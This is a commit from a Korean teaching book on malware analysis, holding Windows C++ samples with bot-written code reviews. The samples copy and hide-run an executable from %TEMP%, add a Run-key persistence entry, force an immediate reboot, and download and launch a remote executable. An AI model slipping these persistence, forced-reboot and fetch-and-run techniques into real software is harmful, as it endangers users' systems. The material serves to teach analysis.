

소스 코드
리버싱 이 정도는 알아야지 - 만들고 분석하면서 배우는 악성코드 분석
bjpublic committed May 25, 2018
1 parent 18c950b commit 17bc608
Showing 12 changed files with 940 additions and 0 deletions.
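--- a/소스 코드/Sample 01.cpp
+++ b/소스 코드/Sample 01.cpp
@@ -0,0 +1,10 @@
+#include <windows.h>
+
+int main( )
+{
+Beep(0x200, 0x300);
+
+MessageBoxA(NULL, "Hi, Have a nice day!", "SecurityFactory", 0);
+
+return 1;
+}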
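Review bot: `return 1;` on the last line of main reports a non-zero exit status, which any harness or script that checks the result will read as failure; `return 0;` is the conventional success value, and the same applies to the other samples in this commit. The two Beep arguments are bare hex constants; a short comment such as `// Beep(frequency Hz, duration ms)` next to `Beep(0x200, 0x300);` would spare the reader a documentation lookup.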
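--- a/소스 코드/Sample 05.cpp
+++ b/소스 코드/Sample 05.cpp
@@ -0,0 +1,98 @@
+#include <windows.h>
+#include <stdio.h>
+
+int main( ) {
+HANDLE hSourceFile, hDestFile;
+TCHAR lpBuffPath[MAX_PATH] = {0,},
+lpTargetPath[MAX_PATH] = {0, };
+char *lpBuffer = NULL;
+DWORD dwFileSize = 0,
+dwRead = 0,
+dwWrite = 0;
+bool bResult = FALSE;
+
+//Get the Current Folder path.
+GetCurrentDirectory(MAX_PATH, lpBuffPath);
+
+//Get Source Sample 01.exe File Path.
+wsprintf(lpTargetPath, "%s%s", lpBuffPath, "\\Sample 01.exe");
+
+//Open the Source Sample 01.exe.
+hSourceFile = CreateFile(lpTargetPath,
+GENERIC_READ,
+0, NULL,
+OPEN_EXISTING,
+FILE_ATTRIBUTE_NORMAL,
+NULL);
+if(hSourceFile == INVALID_HANDLE_VALUE)
+{
+return 0;
+}
+
+//Get Source Sample.exe File Size.
+dwFileSize = GetFileSize(hSourceFile, NULL);
+if(dwFileSize == 0xFFFFFFFF)
+{
+CloseHandle(hSourceFile);
+return 0;
+}
+
+//Allocate Buffer to Memory.
+lpBuffer = (char *)malloc(dwFileSize + 1);
+if(lpBuffer == NULL)
+{
+CloseHandle(hSourceFile);
+return 0;
+}
+
+//Read the Source Sample.exe File Data.
+bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL);
+if(!bResult)
+{
+free(lpBuffer);
+CloseHandle(hSourceFile);
+return 0;
+}
+CloseHandle(hSourceFile);
+
+//Delete the Source Sample.exe.
+bResult = DeleteFile(lpTargetPath);
+if(!bResult)
+{
+free(lpBuffer);
+return 0;
+}
+
+//Get the Temp Folder path.
+GetTempPath(MAX_PATH, lpBuffPath);
+
+//Get Source Sample.exe File Path.
+wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe");
+
+//Create the DestSample.exe.
+hDestFile = CreateFile( lpTargetPath,
+GENERIC_WRITE,
+0, NULL,
+CREATE_NEW,
+FILE_ATTRIBUTE_NORMAL,
+NULL);
+if(hDestFile == INVALID_HANDLE_VALUE)
+{
+free(lpBuffer);
+return 0;
+}
+
+//Write the Source Sample.exe File Data in DestSample.exe File.
+bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL);
+if(!bResult)
+{
+free(lpBuffer);
+CloseHandle(hDestFile);
+return 0;
+}
+CloseHandle(hDestFile);
+
+WinExec(lpTargetPath, SW_HIDE);
+
+return 1;
+}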
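Review bot: `WinExec(lpTargetPath, SW_HIDE);` near the end hands the loader an unquoted command line whose path contains spaces (`...\Temp\Replicated Sample 01.exe`), so per the documented CreateProcess parsing it is tried as `...\Temp\Replicated.exe` and `...\Temp\Replicated Sample.exe` first, and a file planted under either name in the user-writable %TEMP% would run instead — the classic unquoted-path hijack. Build a quoted command line, `TCHAR lpCmd[MAX_PATH + 3]; wsprintf(lpCmd, "\"%s\"", lpTargetPath); WinExec(lpCmd, SW_HIDE);`, or call CreateProcess with the path in lpApplicationName. Separately, `DeleteFile(lpTargetPath)` runs before the replica exists, so if the later CreateFile with CREATE_NEW fails (for instance because a previous run left `Replicated Sample 01.exe` behind) the only copy of the original is already gone; write the replica first and delete the source only after WriteFile succeeds. The return values of GetCurrentDirectory and GetTempPath are also unchecked, and the two wsprintf calls assume the concatenated path still fits in MAX_PATH.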
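--- a/소스 코드/Sample 05_AddFindFileCode.cpp
+++ b/소스 코드/Sample 05_AddFindFileCode.cpp
@@ -0,0 +1,119 @@
+#include <windows.h>
+#include <stdio.h>
+
+int main( ) {
+WIN32_FIND_DATA FileData;
+HANDLE hFind, hSourceFile, hDestFile;
+TCHAR lpBuffPath[MAX_PATH] = {0, },
+lpFindPath[MAX_PATH] = {0, },
+lpTargetPath[MAX_PATH] = {0, };
+char *lpBuffer = NULL;
+DWORD dwFileSize = 0,
+dwRead = 0,
+dwWrite = 0;
+bool bResult = FALSE;
+
+//Get the Current Folder path.
+GetCurrentDirectory(MAX_PATH, lpBuffPath);
+
+//Determines the Find Path.
+wsprintf(lpFindPath, "%s\\%s", lpBuffPath, "*.*");
+
+//Find the first file in the specified area.
+hFind = FindFirstFile(lpFindPath, &FileData);
+if(hFind==INVALID_HANDLE_VALUE)
+{
+return 0;
+}
+
+do {
+if(strcmp(FileData.cFileName, "Sample 01.exe") == 0)
+{
+wsprintf(lpFindPath, "%s\\%s", lpBuffPath, FileData.cFileName);
+
+//Open the Source Sample.exe.
+hSourceFile = CreateFile(lpFindPath,
+GENERIC_READ,
+0, NULL,
+OPEN_EXISTING,
+FILE_ATTRIBUTE_NORMAL,
+NULL);
+if(hSourceFile == INVALID_HANDLE_VALUE)
+{
+CloseHandle(hFind);
+return 0;
+}
+
+//Get Source Sample.exe File Size.
+dwFileSize = GetFileSize(hSourceFile, NULL);
+if(dwFileSize == 0xFFFFFFFF)
+{
+CloseHandle(hSourceFile);
+CloseHandle(hFind);
+return 0;
+}
+
+//Allocate Buffer to Memory.
+lpBuffer = (char *)malloc(dwFileSize + 1);
+if(lpBuffer == NULL)
+{
+CloseHandle(hSourceFile);
+CloseHandle(hFind);
+return 0;
+}
+
+//Read the Source Sample.exe File Data.
+bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL);
+if(!bResult)
+{
+CloseHandle(hSourceFile);
+CloseHandle(hFind);
+return 0;
+}
+CloseHandle(hSourceFile);
+
+//Delete the Source Sample.exe.
+bResult = DeleteFile(lpFindPath);
+if(!bResult)
+{
+CloseHandle(hFind);
+return 0;
+}
+
+//Get the Temp Folder path.
+GetTempPath(MAX_PATH, lpBuffPath);
+
+//Get Source Sample.exe File Path.
+wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe");
+
+//Create the DestSample.exe.
+hDestFile = CreateFile( lpTargetPath,
+GENERIC_WRITE,
+0, NULL,
+CREATE_NEW,
+FILE_ATTRIBUTE_NORMAL,
+NULL);
+if(hDestFile == INVALID_HANDLE_VALUE)
+{
+CloseHandle(hFind);
+return 0;
+}
+
+//Write the Source Sample.exe File Data in DestSample.exe File.
+bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL);
+if(!bResult)
+{
+CloseHandle(hDestFile);
+CloseHandle(hFind);
+return 0;
+}
+CloseHandle(hDestFile);
+
+WinExec(lpTargetPath, SW_HIDE);
+}
+} while(FindNextFile(hFind, &FileData)); //Find Next File in TampPath.
+
+CloseHandle(hFind);
+
+return 1;
+}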
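Review bot: The search handle from FindFirstFile is released with `CloseHandle(hFind)` on every error path and after the loop, but a find handle is not a kernel object handle and must be released with `FindClose(hFind);` — CloseHandle fails with ERROR_INVALID_HANDLE, the search state leaks, and under a debugger the call typically raises an invalid-handle exception. Unlike Sample 05.cpp, none of the returns after `lpBuffer = (char *)malloc(dwFileSize + 1);` free the buffer, and it is never freed on the success path either, so the two samples are inconsistent about cleanup. The `WinExec(lpTargetPath, SW_HIDE);` call has the same unquoted-path problem as Sample 05.cpp, since `Replicated Sample 01.exe` contains spaces; quote the path or use CreateProcess with an explicit lpApplicationName. Note also that `lpBuffPath` is overwritten with the temp directory inside the loop, so any later iteration would build its paths from the wrong base; a comment stating that at most one match is expected would make that intent explicit.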
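--- a/소스 코드/Sample 06.cpp
+++ b/소스 코드/Sample 06.cpp
@@ -0,0 +1,57 @@
+#include <windows.h>
+#include <stdio.h>
+
+int main( )
+{
+HKEY hKey;
+TCHAR lpRunPath[] = "SOFTWARE\\Microsoft\\windows\\CurrentVersion\\Run";
+TCHAR lpSamplePath[] = "C:\\Sample 01.exe";
+TCHAR lpValue[MAX_PATH] = {0,};
+DWORD dwCount = 0,
+dwValueSize = _MAX_PATH;
+LONG lResult;
+
+lResult = RegOpenKeyEx (HKEY_LOCAL_MACHINE,
+lpRunPath,
+0,
+KEY_ALL_ACCESS,
+&hKey);
+if(lResult != ERROR_SUCCESS)
+return 0;
+
+for (dwCount; lResult == 0x0000 || lResult == 0x00EA; dwCount++)
+{
+//Retrieves the value of the registry.
+lResult = RegEnumValue (hKey,
+dwCount,
+lpValue,
+&dwValueSize,
+0, NULL, NULL, NULL);
+
+//If the Sample value exists, delete the value.
+if(!strcmp(lpValue, "Run_Sample"))
+RegDeleteValue(hKey, lpValue);
+}
+
+dwValueSize = (DWORD) strlen(lpSamplePath) + 1;
+
+//Register the Sample values.
+lResult = RegSetValueEx(hKey,
+"Run_Sample",
+0, REG_SZ,
+(BYTE*)lpSamplePath,
+dwValueSize);
+if(lResult != ERROR_SUCCESS)
+{
+RegCloseKey(hKey);
+return 0;
+}
+
+RegCloseKey(hKey);
+
+MessageBox(NULL, "The registration has been completed.\nComputer Reset START!!", "RegEdit", MB_OK);
+
+WinExec("cmd.exe /C shutdown -r -f -t 0", SW_HIDE);
+
+return 1;
+}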
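Review bot: `dwValueSize` is initialised to `_MAX_PATH` once before the loop, but RegEnumValue writes the length of each returned name back into it, so from the second iteration on the buffer size passed in is the previous name's length; any longer name then yields ERROR_MORE_DATA, which the loop condition accepts (`0x00EA`) while `dwCount++` silently skips that entry. Reset it at the top of each iteration, `dwValueSize = _MAX_PATH;`, and write the status codes as `ERROR_SUCCESS` / `ERROR_MORE_DATA` instead of `0x0000` / `0x00EA`. Deleting a value during enumeration also shifts the remaining indices down, so the entry after `Run_Sample` is never examined; since only that one name matters, a single `RegDeleteValue(hKey, "Run_Sample");` with no enumeration does the same job. It is worth a comment that opening HKLM\...\Run with KEY_ALL_ACCESS needs an elevated token — with a standard user token RegOpenKeyEx fails and main returns 0 without any indication.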
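--- a/소스 코드/Sample 07.cpp
+++ b/소스 코드/Sample 07.cpp
@@ -0,0 +1,77 @@
+#include <windows.h>
+#include <wininet.h>
+#include <stdio.h>
+
+int main( ) {
+HINTERNET hInternet, hUrl;
+HANDLE hFile;
+DWORD dwRead = 0,
+dwWritten = 0,
+dwSize = 0;
+TCHAR lpUrlPath[MAX_PATH] = "https://live.sysinternals.com/procexp.exe",
+lpBuffer[100000],
+lpProcPath[256];
+bool bResult = FALSE;
+
+GetTempPath(256, lpProcPath);
+strcat(lpProcPath, "\procexp.exe");
+
+hFile = CreateFile( lpProcPath,
+GENERIC_WRITE,
+0, NULL,
+CREATE_ALWAYS,
+FILE_ATTRIBUTE_NORMAL,
+NULL);
+
+if(hFile != INVALID_HANDLE_VALUE)
+{
+hInternet = InternetOpen( "HTTP",
+INTERNET_OPEN_TYPE_PRECONFIG,
+NULL, NULL, 0);
+if(!hInternet)
+{
+printf("CALL FAIL_InternetOpen!!\n");
+return 0;
+}
+
+hUrl = InternetOpenUrl( hInternet,
+lpUrlPath,
+NULL, 0,
+INTERNET_FLAG_RELOAD, 0);
+if(!hUrl)
+{
+printf("CALL FAIL_InternetOpenUrl!!\n");
+return 0;
+}
+
+//Repeat until the download is complete.
+do {
+//Make sure that the data is ready to be downloaded.
+bResult = InternetQueryDataAvailable(hUrl, &dwSize, 0, 0);
+if(!bResult)
+{
+printf("CALL FAIL_InternetQueryDataAvailable!!\n");
+return 0;
+}
+
+//Read Data From URL.
+bResult = InternetReadFile (hUrl, lpBuffer, dwSize, &dwRead);
+if(!bResult)
+{
+printf("CALL FAIL_InternetReadFile!!\n");
+return 0;
+}
+
+//Write File Data.
+WriteFile (hFile, lpBuffer, dwRead, &dwWritten, NULL);
+} while (dwRead != 0);
+
+InternetCloseHandle (hInternet);
+InternetCloseHandle (hUrl);
+}
+CloseHandle (hFile);
+
+ShellExecute(NULL, "open", lpProcPath, NULL, NULL, SW_SHOW);
+
+return 1;
+}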
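Review bot: `InternetReadFile (hUrl, lpBuffer, dwSize, &dwRead);` passes the byte count reported by InternetQueryDataAvailable straight through as the read size, but `lpBuffer` is a fixed 100000-byte stack array, so a larger available chunk from the server overruns the stack; clamp it first, `if (dwSize > sizeof lpBuffer) dwSize = sizeof lpBuffer;`. The literal in `strcat(lpProcPath, "\procexp.exe");` contains the undefined escape `\p`; MSVC reduces it to `p` with warning C4129, which is the only reason the path comes out as `...\Temp\procexp.exe` (GetTempPath already supplies the trailing backslash), so it should read `"procexp.exe"`. The early returns inside the download loop leave hFile, hInternet and hUrl open and a truncated procexp.exe on disk, and when CreateFile fails the download is skipped entirely while `ShellExecute` still launches whatever procexp.exe already sits in %TEMP%. Nothing verifies the downloaded binary (for example with WinVerifyTrust) before it is executed, which deserves an explicit comment in a sample that fetches and runs code from the network.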
